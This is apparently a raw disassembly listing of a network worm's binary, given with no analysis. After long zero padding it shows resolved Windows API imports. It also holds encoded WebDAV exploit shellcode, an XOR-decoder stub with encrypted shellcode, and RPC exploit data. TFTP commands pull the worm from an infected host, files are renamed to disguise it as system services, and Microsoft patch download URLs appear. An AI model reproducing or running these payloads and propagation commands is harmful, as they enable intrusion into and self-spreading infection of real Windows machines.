db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
db 0
dword_404000 dd 77E36F61h ; resolved to->ADVAPI32.ChangeServiceConfig2Adword_404004 dd 77E377F9h ; resolved to->ADVAPI32.QueryServiceConfig2Adword_404008 dd 77DF3238h ; resolved to->ADVAPI32.StartServiceAdword_40400C dd 77E37311h ; resolved to->ADVAPI32.DeleteServicedword_404010 dd 77DF0953h ; resolved to->ADVAPI32.RegisterServiceCtrlHandlerAdword_404014 dd 77DEB193h ; resolved to->ADVAPI32.SetServiceStatusdword_404018 dd 77E37D39h ; resolved to->ADVAPI32.StartServiceCtrlDispatcherAdword_40401C dd 77DE5EB8h ; resolved to->ADVAPI32.QueryServiceStatus ; sub_402540+17A�r ...
dword_404020 dd 77DF5462h ; resolved to->ADVAPI32.QueryServiceConfigAdword_404024 dd 77E36CC9h ; resolved to->ADVAPI32.ChangeServiceConfigAdword_404028 dd 77DFC534h ; resolved to->ADVAPI32.AdjustTokenPrivilegesdword_40402C dd 77DEADA7h ; resolved to->ADVAPI32.OpenSCManagerA ; sub_402540+11�r ...
dword_404030 dd 77E37071h ; resolved to->ADVAPI32.CreateServiceAdword_404034 dd 77DE5E4Dh ; resolved to->ADVAPI32.CloseServiceHandle ; sub_4023E0+11D�r ...
dword_404038 dd 77DEB88Ch ; resolved to->ADVAPI32.OpenServiceA ; sub_402540+60�r ...
dword_40403C dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExAdword_404040 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKeydword_404044 dd 77DD7753h ; resolved to->ADVAPI32.OpenProcessTokendword_404048 dd 77DFD11Bh ; resolved to->ADVAPI32.LookupPrivilegeValueA align 10h
dword_404050 dd 76D64D33h ; resolved to->IPHLPAPI.IcmpCloseHandledword_404054 dd 76D64D5Eh ; resolved to->IPHLPAPI.IcmpCreateFiledword_404058 dd 76D64B79h ; resolved to->IPHLPAPI.IcmpSendEcho align 10h
dword_404060 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Errordword_404064 dd 7C80977Ah ; resolved to->KERNEL32.InterlockedDecrement ; sub_402C40+2A2�r
dword_404068 dd 7C80FD2Dh ; resolved to->KERNEL32.GlobalAllocdword_40406C dd 7C80FC2Fh ; resolved to->KERNEL32.GlobalFreedword_404070 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcessdword_404074 dd 7C81153Ch ; resolved to->KERNEL32.GetFileAttributesA ; sub_402A00+77�r
dword_404078 dd 7C812782h ; resolved to->KERNEL32.SetFileAttributesA ; sub_402A00+8B�r
dword_40407C dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleAdword_404080 dd 7C80B974h ; resolved to->KERNEL32.UnmapViewOfFiledword_404084 dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_404088 dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrement ; sub_402C40+F�r
dword_40408C dd 7C80998Dh ; resolved to->KERNEL32.LocalAlloc ; sub_402540+7E�r
dword_404090 dd 7C80992Fh ; resolved to->KERNEL32.LocalFree ; sub_402540+1CF�r
dword_404094 dd 7C8111DAh ; resolved to->KERNEL32.GetVersiondword_404098 dd 7C812ADEh ; resolved to->KERNEL32.GetVersionExAdword_40409C dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_4040A0 dd 7C8127A7h ; resolved to->KERNEL32.GetOEMCPdword_4040A4 dd 7C80BF3Dh ; resolved to->KERNEL32.GetSystemDefaultLCIDdword_4040A8 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameA ; sub_402970+A�r
dword_4040AC dd 7C801E16h ; resolved to->KERNEL32.TerminateProcess ; sub_402A00+30�r
dword_4040B0 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObjectdword_4040B4 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileA ; sub_401660+42�r
dword_4040B8 dd 7C80A7D4h ; resolved to->KERNEL32.GetLocalTimedword_4040BC dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_401990+A1�r ...
dword_4040C0 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCount ; sub_401B90+4C�r ...
dword_4040C4 dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_401470+F9�r ...
dword_4040C8 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_401280+6C�r ...
dword_4040CC dd 7C87109Dh ; resolved to->KERNEL32.FreeConsoledword_4040D0 dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryAdword_4040D4 dd 7C864B0Fh ; resolved to->KERNEL32.CreateToolhelp32Snapshotdword_4040D8 dd 7C863DE5h ; resolved to->KERNEL32.Process32Firstdword_4040DC dd 7C863F58h ; resolved to->KERNEL32.Process32Nextdword_4040E0 dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_401000+E1�r ...
dword_4040E4 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_4040E8 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_401780+1D3�r ...
align 10h
dword_4040F0 dd 77C39E7Eh ; resolved to->MSVCRT.exitdword_4040F4 dd 77C32DAEh ; resolved to->MSVCRT._XcptFilterdword_4040F8 dd 77C1EEEBh ; resolved to->MSVCRT.__getmainargsdword_4040FC dd 77C39D67h ; resolved to->MSVCRT._inittermdword_404100 dd 77C47C60h ; resolved to->MSVCRT.strstr ; sub_401B90+80�r ...
dword_404104 dd 77C371BCh ; resolved to->MSVCRT.sranddword_404108 dd 77C29CC5h dword_40410C dd 77C1F1F1h ; resolved to->MSVCRT.__p___initenvdword_404110 dd 77C4D675h ; resolved to->MSVCRT.__setusermatherrdword_404114 dd 77C623D8h ; resolved to->MSVCRT._adjust_fdivdword_404118 dd 77C1F1A4h ; resolved to->MSVCRT.__p__commodedword_40411C dd 77C3F931h ; resolved to->MSVCRT.sprintf ; sub_4015E0+E�r ...
dword_404120 dd 77C47BE0h ; resolved to->MSVCRT.strrchrdword_404124 dd 77C1F1DBh ; resolved to->MSVCRT.__p__fmodedword_404128 dd 77C3537Ch ; resolved to->MSVCRT.__set_app_typedword_40412C dd 77C35C94h ; resolved to->MSVCRT._except_handler3dword_404130 dd 77C4EE2Fh ; resolved to->MSVCRT._controlfpdword_404134 dd 77C39E9Ah ; resolved to->MSVCRT._exitdword_404138 dd 77C29CDDh dword_40413C dd 77C371D3h ; resolved to->MSVCRT.rand ; sub_401280+12B�r ...
dword_404140 dd 77C4624Eh ; resolved to->MSVCRT._stricmp ; sub_4023E0+64�r
align 8
dword_404148 dd 7E45A045h ; resolved to->USER32.ExitWindowsEx align 10h
dword_404150 dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_402B20+57�r ...
dword_404154 dd 71AB406Ah ; resolved to->WS2_32.connect ; sub_402C40+6E�r ...
dword_404158 dd 71AB50C8h ; resolved to->WS2_32.gethostnamedword_40415C dd 71AB3F41h ; resolved to->WS2_32.inet_ntoa ; sub_402C40+7E�r
dword_404160 dd 71AB4FD4h ; resolved to->WS2_32.gethostbyname ; sub_401EA0+1B�r
dword_404164 dd 71AB3EA1h ; resolved to->WS2_32.setsockopt ; sub_401C80+41�r ...
dword_404168 dd 71AB428Ah ; resolved to->WS2_32.send ; sub_401B90+1E�r ...
dword_40416C dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_401B90+65�r ...
dword_404170 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_401990+15D�r ...
dword_404174 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_4020E0+7�r ...
dword_404178 dd 71AB3E00h ; resolved to->WS2_32.binddword_40417C dd 71AB4428h ; resolved to->WS2_32.WSACleanupdword_404180 dd 71AB88D3h ; resolved to->WS2_32.listendword_404184 dd 71AC1028h ; resolved to->WS2_32.accept ; sub_401990+137�r
dword_404188 dd 71AB2BC0h ; resolved to->WS2_32.ntohl ; sub_401990+20�r
dword_40418C dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_404190 dd 71AB2BC0h ; resolved to->WS2_32.ntohldword_404194 dd 71AB2BF4h ; resolved to->WS2_32.inet_addr ; sub_4020E0+27�r ...
dd 0
dword_40419C dd 42D779A3h dd 2 dup(0)
dword_4041A8 dd 0FFFFFFFFh, 4030BCh, 4030D0h, 393h dup(0)dword_405000 dd 0 dword_405004 dd 0 dword_405008 dd 0 dword_40500C dd 0 aU5390U665eU66a db '%u5390%u665e%u66ad%u993d%u7560%u56f8%u5656%u665f%u66ad%u4e3d%u740'
; DATA XREF: sub_401F30+A4�o
db '0%u9023%u612c%u5090%u6659%u90ad%u612c%u548d%u7088%u548d%u908a%u54'
db '8d%u708a%u548d%u908a%u5852%u74aa%u75d8%u90d6%u5058%u5050%u90c3%u6'
db '099',0
align 4
aFfilomidomfafd db 'ffilomidomfafdfgfhinhnlaljbeaaaaaalimmmmmmmmpdklojieaaaaaaipefpai'
; DATA XREF: sub_401F30+C6�o
db 'nlnpeppppppgekbaaaaaaaaijehaigeijdnaaaaaaaamhefpeppppppppilefpaid'
db 'oiahijefpiloaaaabaaaoideaaaaaaibmgaabaaaaaolagibmgaaeaaaaailagdne'
db 'oeoeoeohfpbidmgaeikagegdmfjhfpjikagegdmfihfpcggknggdnfjfihfokppog'
db 'olpofifailhnpaijehpcmdileeceamafliaaaaaamhaaeeddccbbddmamdolomoih'
db 'hppppppcececece',0
align 10h
aU5951U6858U759 db '%u5951%u6858%u759f%u0018%u5951%u6858%u759f%u0018%u5951%u6858%u759'
; DATA XREF: sub_401F30+45�o
db 'f%u0018%u5951%u6858%u759f%u0018%u5951%u6858%u759f%u0018%u5951%u68'
db '58%u759f%u0018%u5951%u6858%u759f%u0018%u5951%u6858%u759f%u0018',0
align 4
a?xmlVersion1_0 db '<?xml version="1.0"?>',0Dh,0Ah
db '<g:searchrequest xmlns:g="DAV:">',0Dh,0Ah
db '<g:sql>',0Dh,0Ah
db 'Select "DAV:displayname" from scope()',0Dh,0Ah
db '</g:sql>',0Dh,0Ah
db '</g:searchrequest>',0Dh,0Ah,0
word_40537C dw 3D30h ; DATA XREF: sub_401280+19D�r
dw 3D9Fh
dd 3D8B3D8Ah, 3D953D91h, 3D9D3D97h, 3DBC3DA1h, 3DE93DF3h
dd 0DCA03D9Ah, 0CA64CA60h, 0CA68CA67h, 0CA71CA66h, 0CB5DCA82h
dd 0CBD0CA62h, 0D20CCBCFh, 0D235D22Ah, 0D344D248h, 0D354D357h
dd 0D360D35Ch, 0D353D362h, 0D3A1D35Fh, 0D3A3D3A2h, 0D39CD390h
dd 0DA6DD39Eh, 0DA05DA04h, 0DA47DA11h, 0DA6ADA00h, 0DB91DAC7h
dd 0DA06DA08h, 0DA58DA3Fh, 0DA45DA59h, 0DA4BDA3Fh, 0DA68DA55h
dd 0DB8ADAC5h, 0DBEADBDEh, 0DCA0DC6Dh, 0DC75DCA3h, 0DCB9DCA2h
dd 0DC71DCBAh, 0DCA6DC70h
off_405414 dd offset aHttpDownload_m ; DATA XREF: sub_401780:loc_4018AF�r
; "http://download.microsoft.com/download/"...
dd offset aHttpDownload_1 ; "http://download.microsoft.com/download/"...
dd offset aHttpDownload_2 ; "http://download.microsoft.com/download/"...
dd offset aHttpDownload_3 ; "http://download.microsoft.com/download/"...
off_405424 dd offset aHttpDownload_0 ; DATA XREF: sub_401780+120�r
; "http://download.microsoft.com/download/"...
dd offset aHttpDownload_4 ; "http://download.microsoft.com/download/"...
dd offset aHttpDownload_5 ; "http://download.microsoft.com/download/"...
dd offset aHttpDownload_6 ; "http://download.microsoft.com/download/"...
dword_405434 dd 30B0005h, 10h, 48h, 7Fh, 16D016D0h, 0 dd 1, 10001h, 1A0h, 0
dd 0C0h, 46000000h, 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2
dword_40547C dd 3000005h, 10hdword_405484 dd 3E8h dd 0E5h, 3D0h, 40001h, 60005h, 1, 0
dd 0FD582432h, 496445CCh, 0AEDD70B0h, 0D2962C74h, 0D5E60h
dd 1, 0
dd 0D5E70h, 2, 0D5E7Ch, 0
dd 10h, 0F1F19680h, 11CE4D2Ah, 20006AA6h, 0F4726EAFh, 0Ch
dd 4252414Dh, 1, 0
dd 0BAADF00Dh, 0
dd 0BF4A8h, 2 dup(360h), 574F454Dh, 4, 1A2h, 0
dd 0C0h, 46000000h, 338h, 0
dd 0C0h, 46000000h, 0
dd 330h, 328h, 0
dd 81001h, 0CCCCCCCCh, 0C8h, 574F454Dh, 328h, 0D8h, 0
dd 2, 7, 4 dup(0)
dd 0CD28C4h, 0CD2964h, 0
dd 7, 1B9h, 0
dd 0C0h, 46000000h, 1ABh, 0
dd 0C0h, 46000000h, 1A5h, 0
dd 0C0h, 46000000h, 1A6h, 0
dd 0C0h, 46000000h, 1A4h, 0
dd 0C0h, 46000000h, 1ADh, 0
dd 0C0h, 46000000h, 1AAh, 0
dd 0C0h, 46000000h, 7, 60h, 58h, 90h, 40h, 20h, 78h, 30h
dd 1, 81001h, 0CCCCCCCCh, 50h, 2088B64Fh, 0FFFFFFFFh, 13h dup(0)
dd 81001h, 0CCCCCCCCh, 48h, 660007h, 20906h, 0
dd 0C0h, 46000000h, 10h, 2 dup(0)
dd 1, 0
dd 0C1978h, 58h, 60005h, 1, 9398D870h, 11D24F98h, 57BE3DA9h
dd 0B2h, 310032h, 81001h, 0CCCCCCCCh, 80h, 0BAADF00Dh
dd 4 dup(0)
dd 144318h, 0
dd 2 dup(60h), 574F454Dh, 4, 1C0h, 0
dd 0C0h, 46000000h, 33Bh, 0
dd 0C0h, 46000000h, 0
dd 30h, 10001h, 317C581h, 4AE90E80h, 8AF19999h, 857A6F50h
dd 2, 5 dup(0)
dd 1, 81001h, 0CCCCCCCCh, 30h, 6E0078h, 0
dd 0DDAD8h, 2 dup(0)
dd 0C2F20h, 2 dup(0)
dd 3, 0
dd 3, 580046h, 0
dd 81001h, 0CCCCCCCCh, 10h, 2E0030h, 4 dup(0)
dd 81001h, 0CCCCCCCCh, 68h, 0FFFF000Eh, 0B8B68h, 2, 2 dup(0)
dword_4057DC dd 20h ; sub_402170+29�w
dword_4057E0 dd 0 dword_4057E4 dd 20h ; sub_402170+2E�w
dword_4057E8 dd 5C005Ch aC1234561111111: ; DATA XREF: sub_402170+7B�o
unicode 0, <\C$\123456111111111111111.doc>,0
aFxnbfxfxnbfxfx: ; DATA XREF: sub_402170+55�o
unicode 0, <FXNBFXFXNBFXFXFXFX>
dword_40584C dd 7F08321Ah db 0CCh
db 0E0h, 0FDh, 7Fh
db 0CCh
db 0E0h, 0FDh, 7Fh
db 126h dup(90h)
; ---------------------------------------------------------------------------
loc_40597E: ; DATA XREF: sub_401F30+13C�o
jmp short loc_405990
; =============== S U B R O U T I N E =======================================
sub_405980 proc far ; CODE XREF: sub_405980:loc_405990�p
pop edx
dec edx
xor ecx, ecx
mov cx, 176h
loc_405988: ; CODE XREF: sub_405980+C�j
xor byte ptr [edx+ecx], 99h
loop loc_405988
jmp short loc_405995
; ---------------------------------------------------------------------------
loc_405990: ; CODE XREF: seg000:loc_40597E�j
call near ptr sub_405980
loc_405995: ; CODE XREF: sub_405980+E�j
jo short loc_4059F8
cdq
cdq
cdq
retn
; ---------------------------------------------------------------------------
db 21h
dd 0E6646995h, 0E9129912h, 0D9123485h, 12411291h, 6A9AA5EAh
dd 9AE1EF12h, 0B9E7126Ah, 0D712629Ah, 0CF74AA8Dh, 0A612C8CEh
dd 6B12629Ah, 6AC097F3h, 0C091ED3Fh, 9D5E1AC6h, 0C0707BDCh
dd 5412C7C6h, 9ABDDF12h, 9A78485Ah, 0FF50AA58h, 0DF129112h
dd 585A9A85h, 589A9B78h, 5A9A9912h
; ---------------------------------------------------------------------------
loc_4059F8: ; CODE XREF: sub_405980:loc_405995�j
adc ah, [ebx+12h]
outsb
sbb bl, [edi-69h]
adc cl, [ecx-0Dh]
call far ptr 9999h:99ED71C0h
sbb bl, [edi-6Ch]
retf
sub_405980 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0CFh, 66h, 0CEh
dd 4112C365h, 71C09AF3h, 999999F8h, 12DD751Ah, 0C089F36Dh
dd 7B179D10h, 0C9C9C962h, 0F398F3C9h, 6DCE669Bh, 0C7104112h
dd 0A5C710A1h, 0FFD9C710h, 98B5DF5Eh, 89DE1498h, 59AACFC9h
dd 0F3C9C9C9h, 14C9C998h, 9B5EA5CEh, 99FDF4FAh, 0CE66C9CBh
dd 9B9E5E71h, 5E9B9999h, 0FAFA9DDEh, 89F3FAFAh, 0CE66CACEh
dd 0CE66CA61h, 0CE66C965h, 3559AA75h, 60EC591Ch, 0CACFCBC8h
dd 0C0C34B66h, 0AA777B32h, 9A715A59h, 0DE666666h, 0EBC9EDFCh
dd 0FDD8FAF6h, 0EAFCEBFDh, 0EBDA99EAh, 0FCEDF8FCh, 0FAF6EBC9h
dd 0D8EAEAFCh, 0F0E1DC99h, 0EBF1CDEDh, 99FDF8FCh, 0FDF8F6D5h
dd 0EBFBF0D5h, 0D8E0EBF8h, 0ABEAEE99h, 99ABAAC6h, 0CAD8CACEh
dd 0FCF2FAF6h, 0FA99D8EDh, 0FCF7F7F6h, 0FA99EDFAh, 0FCEAF6F5h
dd 0F2FAF6EAh, 99EDFCh
dword_405AF4 dd 81001h, 0CCCCCCCCh, 20h, 2D0030h, 0 dd 0C2A88h, 2, 1, 0C8C28h, 1, 7, 0
dd offset aILoveMyWifeBab ; "=========== I love my wife & baby :)~~~"...
aCopyDllcacheTf db 'copy dllcache\tftpd.exe wins\svchost.exe',0Ah
; DATA XREF: sub_401C80+175�o
db 0Dh,0
align 4
aWinsDllhost_ex db 'wins\DLLHOST.EXE',0Ah ; DATA XREF: sub_401C80+1AB�o
; sub_401C80+1BD�o
db 0Dh,0
align 4
word_405B68 dw 29Ah ; DATA XREF: sub_401990+5A�w
; sub_401990+81�r ...
align 4
aRpctftpd db 'RpcTftpd',0 ; DATA XREF: sub_401280+41�o
; sub_401280+E7�o ...
align 4
aRpcpatch db 'RpcPatch',0 ; DATA XREF: sub_401280+37�o
; sub_401660+57�o ...
align 4
aDirDllcacheTft db 'dir dllcache\tftpd.exe',0Ah ; DATA XREF: sub_401C80+11B�o
db 0Dh,0
align 10h
dword_405BA0 dd 4 ; sub_402880:loc_4028F6�r
byte_405BA4 db 3Dh ; DATA XREF: sub_401100:loc_40115A�r
db 3Dh, 2 dup(0CAh)
dd 0D2D2CBCAh, 0DADAD3D3h, 0DCDBh
aDirWinsDllhost db 'dir wins\dllhost.exe',0Ah ; DATA XREF: sub_401C80+D2�o
db 0Dh,0
align 4
aGetHttp1_1Acce db 'GET / HTTP/1.1',0Dh,0Ah ; DATA XREF: sub_402C40+B5�o
db 'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*',0Dh
db 0Ah
db 'User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',0Dh,0Ah
db 'Host: ',0
align 4
aConnectionKeep db 0Dh,0Ah ; DATA XREF: sub_402C40+95�o
db 'Connection: Keep-Alive',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aILoveMyWifeBab db '=========== I love my wife & baby :)~~~ Welcome Chian~~~ Notice'
; DATA XREF: seg000:00405B24�o
db ': 2004 will remove myself:)~~ sorry zhongli~~~=========== wins',0
align 4
aHttpDownload_6 db 'http://download.microsoft.com/download/6/9/5/6957d785-fb7a-4ac9-b'
; DATA XREF: seg000:00405430�o
db '1e6-cb99b62f9f2a/Windows2000-KB823980-x86-KOR.exe',0
align 4
aHttpDownload_5 db 'http://download.microsoft.com/download/5/8/f/58fa7161-8db3-4af4-b'
; DATA XREF: seg000:0040542C�o
db '576-0a56b0a9d8e6/Windows2000-KB823980-x86-CHT.exe',0
align 10h
aHttpDownload_4 db 'http://download.microsoft.com/download/2/8/1/281c0df6-772b-42b0-9'
; DATA XREF: seg000:00405428�o
db '125-6858b759e977/Windows2000-KB823980-x86-CHS.exe',0
align 4
aHttpDownload_0 db 'http://download.microsoft.com/download/0/1/f/01fdd40f-efc5-433d-8'
; DATA XREF: seg000:off_405424�o
db 'ad2-b4b9d42049d5/Windows2000-KB823980-x86-ENU.exe',0
align 4
aHttpDownload_3 db 'http://download.microsoft.com/download/e/3/1/e31b9d29-f650-4078-8'
; DATA XREF: seg000:00405420�o
db 'a76-3e81eb4554f6/WindowsXP-KB823980-x86-KOR.exe',0
align 4
aHttpDownload_2 db 'http://download.microsoft.com/download/2/3/6/236eaaa3-380b-4507-9'
; DATA XREF: seg000:0040541C�o
db 'ac2-6cec324b3ce8/WindowsXP-KB823980-x86-CHT.exe',0
align 10h
aHttpDownload_1 db 'http://download.microsoft.com/download/a/a/5/aa56d061-3a38-44af-8'
; DATA XREF: seg000:00405418�o
db 'd48-85e42de9d2c0/WindowsXP-KB823980-x86-CHS.exe',0
align 4
aHttpDownload_m db 'http://download.microsoft.com/download/9/8/b/98bcfad8-afbc-458f-a'
; DATA XREF: seg000:off_405414�o
db 'aee-b7a52a983f01/WindowsXP-KB823980-x86-ENU.exe',0
align 4
aTftpISGetSvcho db 'tftp -i %s get svchost.exe wins\SVCHOST.EXE',0Ah
; DATA XREF: sub_401210+48�o
db 0Dh,0
align 4
aTftpISGetDllho db 'tftp -i %s get dllhost.exe wins\DLLHOST.EXE',0Ah
; DATA XREF: sub_401210+34�o
db 0Dh,0
align 4
aNetworkConnect db 'Network Connections Sharing',0 ; DATA XREF: sub_4015E0+57�o
aSvchost_exe db 'svchost.exe',0 ; DATA XREF: sub_4015E0+52�o
; sub_4023E0+59�o
aMsdtc db 'MSDTC',0 ; DATA XREF: sub_4015E0+4D�o
align 4
aSWinsSvchost_e db '%s\wins\svchost.exe',0 ; DATA XREF: sub_4015E0+2D�o
aSDllcacheTftpd db '%s\dllcache\tftpd.exe',0 ; DATA XREF: sub_4015E0+19�o
align 4
aWinsClient db 'WINS Client',0 ; DATA XREF: sub_401660+52�o
